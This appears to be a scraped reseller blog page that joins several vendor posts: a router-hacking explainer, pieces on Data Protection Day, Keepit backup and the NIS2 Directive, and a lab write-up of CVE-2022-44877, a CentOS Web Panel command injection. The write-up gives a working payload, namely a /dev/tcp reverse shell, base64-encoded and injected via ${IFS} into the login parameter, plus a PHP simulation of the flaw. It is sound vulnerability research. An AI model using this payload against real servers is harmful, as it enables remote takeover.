Skip to content

What happens when your router is hacked?

Most people understand that routers can be hacked, but not everybody realizes just how damaging this kind of cyberattack can be. In this article, I will explain exactly how a hacker can target your router, what the consequences could be, and what you can do to protect yourself.

Most users underestimate the risk

No one wants to be hacked, but it’s easy to come up with excuses for not addressing router security issues — excuses like:

  • Hackers don’t want to hack me (aka: “I have nothing to hide” or “My data isn’t valuable to anyone”).

  • It’s too complicated to secure my router and configure it properly.

  • I assume that it’s secure by design (aka: “I trust my ISP to secure it”).

Do these excuses look reasonable to you? Maybe, but the truth is that most hackers would be happy to attack your router if it’s not properly protected, especially if they can do so quickly.

Securing your router is not technically complicated – you don’t need an IT specialist to keep your router safe anymore than you need an automobile engineer to drive your car. Making sure your router is protected should be a standard part of internet use.

Finally, you should not trust your internet service provider (ISP) to keep you safe. More often than not, its security measures are inadequate.

Types of vulnerabilities

Routers are commonly attacked using five main methods. In all the cases, an attacker gets root access (also known as administrative access) and gains full control of the device. The following list begins with the most unlikely and challenging hacks and ends with most common methods, which are also the easiest for the hacker. Each method also comes with an example of the tools and exploits a hacker could use to carry them out.

Physical (Hacking level: extremely difficult)

A physical attack requires the hacker to get physical access to your router. If they manage this, they can bypass security measures and get full administrator access. This process usually involves connecting the router to special hardware (in most cases, a serial console or JTAG).

While it may be a challenge for them to get close to your home router, hackers can use other ways to gain physical access to these devices. For example, they could target an outdoor wireless extender placed in the yard or a wireless router in a hotel that is used by guests.

  • Example: Almost any device with easy access to TTL or JTAG (for example, D-Link DIR-825AC) could be used to launch this hack. JTAG can also be used legitimately to unlock and customize a router.

Local authenticated (Hacking level: moderately difficult)

To perform a local authenticated attack, a hacker must connect to your LAN (local area network) or Wi-Fi. Usually this involves connecting a tiny device to a free network socket or cracking a weak wireless password.

The hacker must also know the default administrator’s password (or be able to brute force it). Collections of default router passwords are available to hackers online as well as tools that allow them to brute force weak passwords. Infecting a local connected device, like a laptop or smartphone, could give the hacker the same level of access to your local network.

Local unauthenticated (Hacking level: challenging)

Like the local authenticated method, a local unauthenticated attack requires the hacker to connect to the LAN or Wi-Fi or to infect a local device. This time, however, the hacker does not need to know the administrator’s password.

Usually, local unauthenticated attacks involve exploiting some software vulnerability in your router’s firmware (for example, the buffer overflow in its web management function) or accessing misconfigured components (like a default telnet left without password protection).

Remote authenticated (Hacking level: relatively easy)

Remote authenticated attacks are possible against certain routers via the internet, so the hacker doesn’t need to be close to you or join your LAN. They still need to know some default credentials to bypass the service password, but they can also brute force it if necessary.

  • Example: The Huawei LANSwitch model with a default Web UI open to the internet. This exploit was resolved in January 2023 but still acts as a good example of a remote authenticated threat — albeit one that is no longer active.

Remote unauthenticated (Hacking level: very easy)

Remote unauthenticated attacks are the worst-case scenario. Remote unauthenticated attacks can occur if anyone can access the router from the internet, without needing an administrator’s credentials.

Usually, if a router can be accessed in this way, it is the result of the device coming with bad default configuration, a hidden backdoor, or a vulnerability in the software. In some nightmare scenarios, a router may end up with all three of these issues.

A router with these problems can be quickly scanned and exploited by thousands of automated bots or commercial providers (Shodan, for example). It takes between a few minutes and a few hours for the first bot to reach the device once it’s been connected to the internet. After scanning the router, a bot will be able identify the model and use the appropriate script to gain the access.

What happens once you’ve been hacked?

Your router has been hacked. What happens now? After gaining root access, the attacker’s power over the device is unlimited. Here are some of the steps a hacker might take next:

  • Add a persistent backdoor to allow for remote device use or botnet inclusion.

  • View your unencrypted traffic in plain text (using tcpdump, for example).

  • Carry out deep packet inspection (DPI) on any encrypted traffic.

  • Redirect your traffic (for example, through DNS spoofing or by using iptables).

  • Launch social engineering attacks against you (for example, a hacker could redirect you to a fake website, pretending to be your online banking platform, where you might expose sensitive information).

  • Disconnect you from the internet and demand a ransom to restore access.

  • Make your router a proxy for other criminals to perform criminal activities from your IP address (potentially leaving you to convince the police that you weren’t the source of the criminal activity).

  • Hack your other devices (moving laterally) which were not accessible from the internet. If successful, this could allow the hacker to install ransomware or cryptominer malware on your other computers at home.

Still think it’s not worth your time to secure your router?

How to protect your router

If you think it’s time to start protecting your router and the devices connected to it, take the following steps.

  • Understand that your data is valuable. Even if you are not a celebrity or a high-profile politician, it’s still worth a hacker’s time to attack your router. Always see yourself as a potential target. You don’t have to be paranoid, but don’t ignore the risks.

  • Buy a user-friendly router that has good documentation and a clear user interface and that provides technical support and firmware updates. These routers may cost more, but security is a worthwhile investment.

  • Do not trust your ISP. ISPs tend to lower maintenance costs by saving on security. If possible, avoid using the router provided by your ISP, or at least unlock and take full control of it (change the default password, disable remote management, remove backdoors, and enable a firewall).

  • If possible, use WPA3, and protect yourself with a non-dictionary-based password containing at least ten characters. Never use WEP or unencrypted Wi-FI.

  • Use a VPN on your local devices (laptops, phones, TVs) to encrypt traffic.

You should now understand both the risks of an unsecured router and the actions you can take today to protect it. Stay safe!

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Nord Security
The web has become a chaotic space where safety and trust have been compromised by cybercrime and data protection issues. Therefore, our team has a global mission to shape a more trusted and peaceful online future for people everywhere.

Data Protection Day Is Here!

Data Protection Day – also known as Data Privacy Day – is an annual event observed on January 28 to raise awareness about the importance of protecting data and data privacy (think NIS Directive, NIS2 Directive, and GDPR).

It’s here to make data protection, such as SaaS data backup and recovery, top of mind—and for good reason.

Businesses must take the necessary measures to not only ensure the continuity of their operations and to protect themselves from the potentially catastrophic outcomes of a data loss event like ransomware, but to also comply with the increasingly strict demands from legislation such as the NIS2 Directive and the GDPR.

 

Why Is Data Protection Relevant?

As businesses increasingly move operations to software-as-a-service (SaaS) applications to streamline their operations, add flexibility (such as enabling remote work), and reduce operational costs, huge amounts of business-critical cloud data are produced every day, and it becomes ever more important to assess and ensure a robust backup and recovery plan is in place.

There is a widely shared assumption that data stored in a SaaS cloud is automatically backed up and secure since it’s in the cloud. However, that is not always the case as what is offered may not provide the protection necessary for business continuity, data restoration, or compliance: Read more about the M365 shared responsibility model.

Cloud Data Concerns

It should come as no surprise that working with cloud services can come with risks. Ransomware and disaster recovery are more and more frequently in the headlines and serve as cautionary tales. (Read our post about the disruptive power of ransomware attacks here.)

The rapid adoption of SaaS applications has also come with new and increased instances of data loss and breaches—especially in cases where there is a lag between adoption of SaaS apps and adoption of the necessary data protection. Companies may be left vulnerable to costly disruptions, downtime, and devastating fines without an adequate data security plan in place to safeguard mission-critical cloud data.

What Needs to Be Backed Up?

Data protection not only involves “just” backing up cloud SaaS data, but it should also focus on ensuring control of and continuous access to it (and the right access for the correct users at that). As with Microsoft 365 and Azure AD (Active Directory), there is a data plane and a control plane – and both need to be protected.

One way to achieve this is to adopt a solution that can not only protect the data plane but can also preserve and protect the control plane, e.g., the admin center. Coverage of identity and application objects businesses rely on to remain operational is vital. For those using Microsoft 365, it’s important to learn about why you also need Azure AD data protection: Find out why in our AAD blog here.

 

How Do Businesses Protect Their Data?

The best way to mitigate the risks of SaaS is to implement a data protection and management plan. This can involve using cloud-based data backup and recovery solutions which allow businesses to store their data in an independent cloud and access it from anywhere, at any time.

Data protection is especially important for businesses that rely on SaaS data for their operations, which is many, many businesses (Microsoft 365 alone has over 345 million users), as it can help ensure that data is always available, even if there is a disruption with the SaaS provider.

While cloud services can (and do) provide many benefits for businesses, they also present their own set of risks. For example, there is a very real risk that data stored in the cloud could be accessed by unauthorized parties (read our blog about the Zero Trust Principle here), or that data could be lost due to any number of issues, from technical glitches and issues to human error. Therefore, it’s important for companies to follow cloud data protection best practices. Read about backup strategy here.

 

Data Risks and Responsibility

But why is backing up SaaS data so important? Because it allows companies to mitigate the effects of ransomware and other data loss events. Many SaaS providers (e.g., Google, Microsoft, Salesforce) have shared responsibility models that state you, the customer, are responsible for the data created and processed.

Here are a few reasons why backup is vital:

  1. Data breaches can happen to anyone.

    While no company is immune to data breaches, having a backup solution in place can help minimize (or even nullify) the impact of a breach, helping businesses get up and running again quickly.
  2. Data loss can be costly.

    Losing data can lead to lost productivity and lost revenue within the company, and it can even result in substantial legal penalties. (Read our NIS2 post here.) According to the World Economic Forum, “historically severe fines for data loss are also helping change the cost-benefit assessment around investment in cybersecurity measures.” By implementing a backup solution, businesses can minimize the impact of data loss, avoid fines, and get back to business as usual faster, and more comprehensively, than without.
  3. The future is uncertain.

    A bit cliché, but it’s impossible to predict the future and that includes the risks to your data. According to the ESG (Enterprise Strategy Group) ransomware e-Book, “79% of respondent organizations report having experienced a ransomware attack within the last year.” By implementing a backup solution now, businesses can protect themselves against potential risks down the road – which stand to only increase.

 

Where to Go from Here?

Data Protection Day reminds us that SaaS data (and the protection of it) is essential to many daily operations. Not only that, with the scope and penalties of NIS2 and GDPR, enterprises are obligated to ensure a dedicated data protection solution is in place.

Researching a third-party backup solution like Keepit can simplify the complexity of the current SaaS data protection environment. Businesses can maintain control of their data always and protect themselves against data loss events and mitigate the impacts of breaches and ransomware – all while remaining compliant.

Don’t wait until it’s too late — what better way to celebrate Data Protection Day than to start backing up your SaaS data. Continue your journey by exploring our free e-guide “Leading SaaS Data Security: Raising the Bar for Data Protection in the Cloud Era.”

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Keepit
At Keepit, we believe in a digital future where all software is delivered as a service. Keepit’s mission is to protect data in the cloud Keepit is a software company specializing in Cloud-to-Cloud data backup and recovery. Deriving from +20 year experience in building best-in-class data protection and hosting services, Keepit is pioneering the way to secure and protect cloud data at scale.

Why Cloud Data Protection Is a Core Business Requirement

The more we advance and become smarter and more efficient through new technology, the greater the opportunity for IT to inadvertently fall out of alignment with business goals. By this I mean, technology simplifies things, so users have the opportunity to bypass IT involvement and set up new processes which start driving part of the business. The downside is if you don’t have systems in place to protect these new processes, they become adopted without the benefit of protection around it.

Contributed Article: Time for a New Conversation On Cloud Data Backup

Niels Van Ingen, Keepit’s Chief Customer Officer, has contributed a blog post on how cloud backup is essential for protecting business data and ensuring continuity.

This conversation revolves around how cloud data protection is a must-have for any organization: protection that is secure, reliable, and accessible from anywhere. Van Ingen, a veteran of the data protection and management space, provides insight on this imperative. 

What he refers to as a “wild west” mentality, he sees there is a lack of holistic data security planning which can lead to profound consequences for enterprises. Van Ingen shares how businesses should frame the discourse around cloud applications to safely manage the ever-growing dependence on them and the data they produce to minimize (or in some cases eliminate) business disruption. 

Read the full article “The Business Case for Data Backup and Recovery” from Disaster Recovery Journal here

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Keepit
At Keepit, we believe in a digital future where all software is delivered as a service. Keepit’s mission is to protect data in the cloud Keepit is a software company specializing in Cloud-to-Cloud data backup and recovery. Deriving from +20 year experience in building best-in-class data protection and hosting services, Keepit is pioneering the way to secure and protect cloud data at scale.

What Is the NIS2 Directive?

On November 10, 2022 (published on 27 December 2022), the EU Parliament adopted new legislation (the NIS2 Directive) to strengthen EU-wide cybersecurity resilience which includes, among other requirements, a crystal-clear requirement for backup and disaster recovery.

The Network and Information Security Directive (NIS2) is a response to the increased exposure of Europe to cyberthreats and the fact that the more interconnected we are, the more we are vulnerable to malicious cyber activity. The regulators hereby set consistent rules for companies and ensure that law enforcement and judicial authorities can work effectively and raise the awareness of EU citizens on cybersecurity.

Keepit supports the EU initiative on protecting our digital infrastructure, our sensitive business data, as well as our personal data.

What Is the Purpose of the NIS Directive?

In comparison to the first NIS directive, the purpose of the NIS2 Directive is to expand the requirements and sanctioning of cybersecurity to harmonize and streamline the level of security across member states—and with tougher requirements for several sectors.

The European Parliamentary Research Service (EPRS), in a briefing on the NIS2 Directive, tells that due to the fact that cyberattacks are quickly growing in number worldwide, as well as increasing in scale, cost and sophistication, “the Commission has submitted this proposal to replace the original NIS Directive and thereby strengthen the security requirements, address the security of supply chains, streamline reporting obligations, and introduce more stringent supervisory measures and stricter enforcement requirements.”

So what has lead to the need for more requirements? According to the WEF Global Risks Report 2023, it is because:

The ever-increasing intertwining of technologies with the critical functioning of societies is exposing populations to direct domestic threats, including those that seek to shatter societal functioning.

Who Does NIS2 Apply To? Which Sectors and entities?

The directive applies particularly to two categories, with those two being “essential” entities and “important” entities. 

The following are classified as essential sectors: 

  • Energy (electricity, district heating, oil, gas, and hydrogen) 
  • Transport (air, rail, water, and road) 
  • Banking (credit institutions) 
  • Financial market infrastructures (marketplaces) 
  • The health sector (healthcare providers and manufacturers of pharmaceuticals, etc.) 
  • Drinking and wastewater 
  • Digital infrastructure (including providers of cloud services, data centers, domain name systems (DNS), top-level domain registries (TLD) and public communication networks) 
  • Information and communication service providers (ICT services) 
  • Providers of managed services and managed security services 
  • Public administration  
  • Space  

The ‘important entities’ includes public and private entities within: 

  • Postal and courier services 
  • Waste management 
  • Manufacture, production, and distribution of chemicals 
  • Manufacture, processing, and distribution of food 
  • Production of i.a., electronics, machinery, and motor vehicles 
  • Providers of certain digital services (online marketplaces and search engines and social networking services) 
  • Research (higher education institutions and research institutions). 

If you are an entity that provides a service that is essential for the maintenance of critical societal and/or economic activities—for example, a transport company—you are, in the eyes of the law, classified as an “operator of essential services.” 

This classification will entail a lot of pressure on your technical and organizational structure and capabilities due to the extensive risk management security you are required by law to implement and maintain.

NIS2 Requirements, Risk Management, and Security Measures

The current NIS Directive requires the covered entities to take appropriate and proportionate technical and organizational measures to manage security risks and limit the damage in the event of a security incident. 

The NIS2 Directive continues this requirement and sets out additional requirements for appropriate security measures, which must now include as a minimum: 

  • Policies for risk analysis and information security 
  • Incident handling 
  • Business continuity, such as backup management and disaster recovery and crisis management 
  • Supply chain security, including supplier management/security 
  • Security in connection with the acquisition, development, and maintenance of network and information systems 
  • Policies and procedures for assessing the effectiveness of measures to manage cyber security risks 
  • Guidelines for basic ‘computer hygiene’ and cyber security training 
  • Policies for Use of Cryptography and Encryption 
  • Employee security, access control, and asset management 
  • Securing internal communication systems. 

Negotiating and Navigating the NIS2 Directive 

A dedicated backup and data management solution can help your organization implement resilient data protection and management services for your SaaS workloads, such as Microsoft 365 and Salesforce.

Keepit offers a suite of services for your SaaS data which can help you comply with the legal requirements of the NIS2 Directive with the overall goal of protecting your business continuity. 

However, you need to decide which functions are essential and determine how ready you are to maintain those critical functions after an emergency or a disruption—and finally allocate the available budget accordingly. Read our article: Data Compliance Makes Third-Party Security a Must. 

Governance 

With the NIS2 Directive, the governance provisions are tightened as the responsibility for violation of the NIS2 Directive is not only imposed on the legal entity but on the management itself. 

Thus, management must approve the risk management measures taken by the entity regarding cybersecurity and oversee implementation and maintenance. What’s key to a backup strategy? Read our blog post on the 3-2-1 backup rule here.

To ensure sufficient competencies, management members must regularly follow specific courses to obtain the necessary knowledge, insight, and skills to understand and assess cybersecurity risks and management practices and their impact on the entity’s operations.  

Supervision, Enforcement, and Sanctions 

According to the NIS2 Directive, the competent national authorities must oversee compliance with the directive’s security and notification requirements based on specific incidents—and the competent authorities are empowered to issue certain orders.

What Are the Costs of Non-compliance?

The competent authority can, among other things, issue warnings and orders and (particularly materially) temporarily suspend or request that a person with management responsibility (CEO or another senior member of management) be temporarily suspended from exercising management functions in the entity.

The NIS2 Directive also tightens the sanction options. In addition to having to ensure that violations are punished with sanctions that are effective, proportionate to the violation, and have a dissuasive effect, the competent authority in the Member States now has the concrete possibility to impose administrative fines if the entity does not comply with the directive’s requirements for risk management measures or reporting obligations.

The administrative fines are as follow: 

Essential entities – as a minimum – can be fined up to a maximum of 10 million EUR or 2% of the company’s total global annual revenue.

Important entities – as a minimum – can be fined up to a maximum of 7 million EUR or 1.4% of the company’s total global annual revenue. 

When Does It Begin? Timeline and Important Dates 

The EU member states will now have 20 months to transpose the new directive into national law. Want to know more about the important dates and the timeline surrounding NIS2 entering into force? Go to https://www.nis-2-directive.com/ to learn more about the important dates. 

What Are the Next Steps? Educate with Further Reading 

We recommend starting to educate yourself and your organization on the legal requirements and to start mapping for compliance gaps with the requirement for risk management and risk measures. You can read the EU Parliament briefing of the legislation here. 

For those wanting an in-depth look into the matter, the European Parliament has shared the full texts adopted regarding this proposal, which can be read in PDF format here

Beyond the NIS2 Directive, Keepit delivers a solid return on investment beyond the critical compliance requirements. Check out our post entitled “What’s the Return on Investment (ROI) of a cloud backup solution” here.

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Keepit
At Keepit, we believe in a digital future where all software is delivered as a service. Keepit’s mission is to protect data in the cloud Keepit is a software company specializing in Cloud-to-Cloud data backup and recovery. Deriving from +20 year experience in building best-in-class data protection and hosting services, Keepit is pioneering the way to secure and protect cloud data at scale.

Unauthenticated RCE in Centos Control Web Panel 7 (CWP) - CVE-2022–44877

Introduction

Unauthenticated RCE in Centos Web Panel 7 — CWP 7 has been found and registered as CVE-2022–44877.

Version affected Centos Web Panel 7 - < 0.9.8.1147

This is one of the CVEs of the month and based on Greynoise (Check it here) there are 6 unique IPs attempted to exploit this CVE.

https://cdn-images-1.medium.com/max/800/1*kjYS6n8oVFp007KT0rarvA.png

Based on Shodan search (check it here) CWP is running on 453,848 servers

https://cdn-images-1.medium.com/max/800/1*CGjO4kehKdauxOed8hGxMA.png

Build the lab

Install the system

  • Setup CentOS 7
  • Install wget sudo yum -y install wget
  • Update the system sudo yum -y update
  • Reboot

Install CWP

Follow these commands:

  • sudo su
  • cd /usr/local/src
  • wget http://centos-webpanel.com/cwp-el7-latest
  • sh cwp-el7-latest
  • After the installation is done reboot the system

Downgrade CWP to the vulnerable version

Follow these commands:

  • cd /usr/local/cwpsrv/htdocs
  • chattr -i -R /usr/local/cwpsrv/htdocs
  • wget http://static.cdn-cwp.com/files/cwp/el7/cwp-el7-0.9.8.1146.zip
  • unzip -o -q cwp-el7-0.9.8.1146.zip
  • rm -f cwp-el7-0.9.8.1146.zip
  • Reboot the system

Login to CWP

https://cdn-images-1.medium.com/max/800/1*ZMsLy8ArzSoKnYwtGxdVfg.png

  • The username and password are the root user and the password of the root.

https://cdn-images-1.medium.com/max/800/1*khtCbAQFBYWWNnw54brvKQ.png

The vulnerability

The vulnerability existed in “login” parameter in the login page

  • Capture the login request

  • Now, let’s make a simple test by trying to curl website
  • Run http simple server python3 -m http.server

  • replace “login=logout” with login=$(curl${IFS}192.168.1.105:8000)

and here is the request:

While I’m reproducing this vulnerability I noticed something with the authentication.

This is supposed to be “unauthenticated RCE”, but I found out that you still need to know the correct username.

Here are some test cases:

  • Send the payload with the incorrect username & incorrect password ❌
  • Send the payload with the incorrect username & correct password ❌
  • Send the payload with the correct username & incorrect password ✅

Before we go to how to get a reverse shell, let’s explain the payload 

Let’s take this payload as an example:

$(curl${IFS}192.168.1.105:8000)

  • The IFS variable is being used here in a way that it’s being used as a separator between 
  • the curl command and the URL, which is “192.168.1.105:8000”.
  • The $() operator is used to execute the command inside the parentheses and returns the output. This means that the command is making a request to the specified IP address and port number using, and the output of the request will be returned and can be used in the following commands or assigned to a variable.

The RCE

  • Here is the reverse shell:

sh -i >& /dev/tcp/192.168.1.105/9001 0>&1

  • Encode the reverse shell to Base64

c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xLjEwNS85MDAxIDA+JjE=

  • The final format of the payload:

$(echo${IFS}c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xLjEwNS85MDAxIDA+JjE=${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash)

  • Start the listener
  • Send the payload

  • Receive the connection

  • Let’s see where the execution happened 

Now we know that the login page under admin it’s the vulnerable one.Let’s move to the static analysis

Static Analysis

Open the source code we downloaded from here:

http://static.cdn-cwp.com/files/cwp/el7/cwp-el7-0.9.8.1146.zip

Unfortunately, this is all that we got.

The source code is encoded with ionCube, it’s easy to decode it or reverse engineer it, and it’s illegal.

We only have one line script here which checks if the IonCube Loader extension is loaded and if not, it attempts to load it dynamically.

Since we don’t have the source code I wanted to get more insight into what the code would look like.

So I started to run more analysis trying to understand the code in the back-end so I can simulate it:

  • I know that any command execution results getting stored in the logs

The login errors getting recorded in/var/log/cwp_client_login.log 

now cat cwp_client_login.log 

While I’m doing this I noticed the following:

As we mentioned before, the user should be correct and we are assuming that we don’t know the password.Since this is failed login, the website will redirect the user to log in again.

in this case, the command will not execute ❌

in case we are using Brupsuite, once we send the request the command gets executed ✅

Since the results of the executed commands getting recorded in the log files, I want to analyze the logs.

2023-01-25 20:44:27 root Failed Login from: 192.168.1.107 on: 'https://localhost:2031/login/index.php?login=root'
  • The “2023–01–25 20:44:27” date and time get changed every time, so this is a variable.
  • The “root” is the user
  • “Failed Login from:” This is a message and it’s the same every time
  • The “192.168.1.107” is the IP of the user who is trying to log in

    https://localhost:2031/login/index.php?login=root I’m not sure why it’s “localhost” here, however, what we inject after “login=” it’s getting executed and this changes every time so it’s a variable.

$error = $DATE.$USER."Failed Login form:".$URL

The facts we gathered:

  • There is a check, if the user is not correct the execution doesn’t work.
  • When the login error happens the URL with the parameter getting recorded in cwp_client_login.log
  • The date changes, the user (I’m not sure about it, but it should be a variable as well), the failed login statement, and the user IP.

This brings us to a very interesting conclusion, only IF there is a login error where the user is correct, the URL along with the parameter will be stored in the log file.

we can understand that there is something wrong that happened when the whole URL gets passed and not enough sanitization. 

After more reading about this specific CVE, I found that the URL is getting passed to some execution function and that’s how the false attempts are logged

The mentioned technique in the blogs are as follows:

echo "incorrect_enter, IP address, HTTP_request_URI" >> ./wring_entry.log

After I made some tests, I found that unless we passed the payload in this specific way such as:

  • $(command)
  • ` command `

it won’t execute, so that means there is something else. more searching, and asking questions. I was looking for functions in PHP I may use to sanitize a parameter against command injection. because if they are passing anything to execute a command they are supposed to sanitize the passed parameters first.

I found those two:

  • escapeshellarg(): This function is used to escape a string to be used as a command-line argument in a shell command. It adds single quotes around the string and escapes any existing single quotes within the string, ensuring that the string is treated as a single argument and is protected against injection attacks.
  • escapeshellcmd(): This function is used to escape a string that is used as a shell command. It escapes any characters that may be used to inject additional commands into the shell command.

I also found this resource:

https://github.com/kacperszurek/exploits/blob/master/GitList/exploit-bypass-php-escapeshellarg-escapeshellcmd.md#what-escapeshellarg-and-escapeshellcmd-really-do

Simulating the back-end code

This is my final conclusion of how the code could look like in the backend:

<?php
if(isset($_POST['login'])) {
    $date_time = date("Y-m-d H:i:s");
    $username = $_POST['username'];
    $password = $_POST['password'];
    $url = $_SERVER['REQUEST_URI'];
    $remote_ip = $_SERVER["REMOTE_ADDR"];
    if($username != "root"){
        echo "You are not authorized to login";
    }
    else {
        if($username == "root") {
            $escapedUrl = escapeshellarg($url);
            system("echo \"" . $date_time . " " . $username . " Successful Login from: " . $remote_ip . " on: " . $escapedUrl . "\" >> cwp_client_login.log");
            echo "Welcome root";
        }
        else {
            echo "Wrong Password or Username!";
        }
    }
}
?>

<form action="" method="post" data-trp-original-action="">
    <label for="username">Username:</label>
    <input type="text" name="username" required>
    <br>
    <label for="password">Password:</label>
    <input type="password" name="password" required>
    <br>
    <input type="submit" name="login" value="Login">
<input type="hidden" name="trp-form-language" value="en"/></form>

Run the code to test it

php -S ip:port test.php 

  • Send the request

Mitigation

Upgrade CWP to the latest version.

Final thoughts

This is a very simple and easy vulnerability to exploit and that is what makes it more dangerous, however, it’s always interesting and fun to dive deep into the source code and understand the root cause of the vulnerability.

In our case since the code is encoded and it’s illegal to decode it, I tried to give more insight into how this vulnerability might be happening in the backend therefore I needed to conduct a lot more analysis and tests, also go through tons of researching and asking questions.

Resources:

#CVE-2022-44877 #CWP #RCE

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About VRX
VRX is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.

×

Hello!

Click one of our contacts below to chat on WhatsApp

Social Chat is free, download and try it now here!

×